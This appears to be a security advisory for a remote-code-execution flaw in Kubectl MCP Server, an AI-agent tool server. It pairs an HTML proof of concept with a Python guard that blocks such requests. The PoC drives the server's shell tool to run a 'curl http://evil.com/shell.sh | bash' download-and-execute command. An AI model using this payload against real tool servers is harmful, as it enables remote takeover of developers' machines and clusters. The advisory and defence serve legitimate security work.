An issue in Open Source Kubectl MCP Server v1.1.1 allows attackers to execute arbitrary code on a victim system via user interaction with a crafted HTML page.
CVSS Details
CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
Open Source Kubectl MCP Server v1.1.1
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!--
// PoC for CVE-2025-65719: Kubectl MCP Server RCE
// This HTML demonstrates the concept of exploiting the vulnerability via crafted request.
-->
<html>
<body>
<script>
// Construct a malicious payload targeting the MCP server's tool execution interface
var payload = {
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "kubectl-shell",
    "arguments": {
      "command": "curl http://evil.com/shell.sh | bash"
    }
  }
};
// Attempt to send the request to the local MCP server (default port may vary)
fetch('http://127.0.0.1:3000/', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify(payload)
}).then(r => console.log('Request sent'));
</script>
<p>CVE-2025-65719 PoC Loaded. Check console.</p>
</body>
</html>
```
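The PoC above relies on a web page being able to POST a JSON-RPC `tools/call` to a server listening on localhost with no caller check. As an added defender-side example (not part of this advisory and not the project's own code), here is a request guard for such an endpoint: it refuses browser-originated cross-site POSTs, insists on the JSON media type and a bearer secret, and keeps shell-style tools off the HTTP transport. The origin allowlist, the token value, and the sample request are constructed assumptions for illustration.

```python
import json

# Constructed policy values for this example; not taken from the advisory.
ALLOWED_ORIGINS: set[str] = set()      # a local MCP server has no legitimate browser callers
EXPECTED_TOKEN = "REPLACE-WITH-RANDOM-SECRET"  # placeholder; generate a random secret per install
SHELL_TOOLS = {"kubectl-shell"}         # tools that hand the caller a shell

# Constructed request in the shape of the PoC's fetch(): a cross-site page POSTing tools/call.
POC_STYLE_HEADERS = {"Origin": "http://attacker.example", "Content-Type": "application/json"}
POC_STYLE_BODY = json.dumps({"jsonrpc": "2.0", "id": 1, "method": "tools/call",
                             "params": {"name": "kubectl-shell", "arguments": {"command": "id"}}}).encode()


def guard_request(headers: dict, body: bytes) -> tuple[bool, str]:
    """Return (allowed, reason) for one JSON-RPC request to the MCP HTTP endpoint."""
    h = {k.lower(): v for k, v in headers.items()}

    # 1. Browsers set Origin on every cross-site POST; a local CLI/agent client does not.
    #    Any Origin that is not explicitly allowed therefore means "a web page sent this".
    origin = h.get("origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, f"cross-site request from origin {origin!r} rejected"

    # 2. Insist on the real JSON media type so a text/plain "simple request" that
    #    skips the CORS preflight is not treated as JSON-RPC.
    if h.get("content-type", "").split(";")[0].strip().lower() != "application/json":
        return False, "content-type must be application/json"

    # 3. Require a bearer secret that a foreign page cannot read or guess.
    if h.get("authorization") != f"Bearer {EXPECTED_TOKEN}":
        return False, "missing or invalid bearer token"

    # 4. Parse JSON-RPC and refuse shell-style tools on the network transport.
    try:
        req = json.loads(body)
    except ValueError:
        return False, "body is not valid JSON"
    if not isinstance(req, dict) or req.get("jsonrpc") != "2.0" or "method" not in req:
        return False, "not a JSON-RPC 2.0 request"
    if req["method"] == "tools/call":
        tool = (req.get("params") or {}).get("name")
        if tool in SHELL_TOOLS:
            return False, f"tool {tool!r} is not exposed over HTTP"
    return True, "ok"


if __name__ == "__main__":
    # The PoC-shaped request is stopped at the first check, before any tool runs.
    print(guard_request(POC_STYLE_HEADERS, POC_STYLE_BODY))
```

Each check is independent, so a request that strips the Origin header still has to present the secret, and even an authenticated local client cannot reach the shell tool over HTTP.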